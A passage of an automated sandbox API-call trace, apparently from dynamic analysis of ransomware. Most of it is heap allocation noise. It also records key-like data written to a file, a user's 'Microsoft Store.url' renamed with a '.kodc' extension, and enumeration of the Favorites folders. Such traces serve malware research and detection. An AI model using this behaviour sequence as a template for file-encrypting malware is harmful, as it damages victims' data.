hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5fb0 | out: hHeap=0x630000) returned 1 [0101.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.502] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x81, lpOverlapped=0x0) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.502] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.502] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.503] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.503] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.503] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.503] CloseHandle (hObject=0x5cc) returned 1 [0101.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0101.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.516] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.kodc")) returned 1 [0101.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.517] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0101.518] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0101.518] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.519] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0101.519] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.525] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0101.525] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0101.525] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS 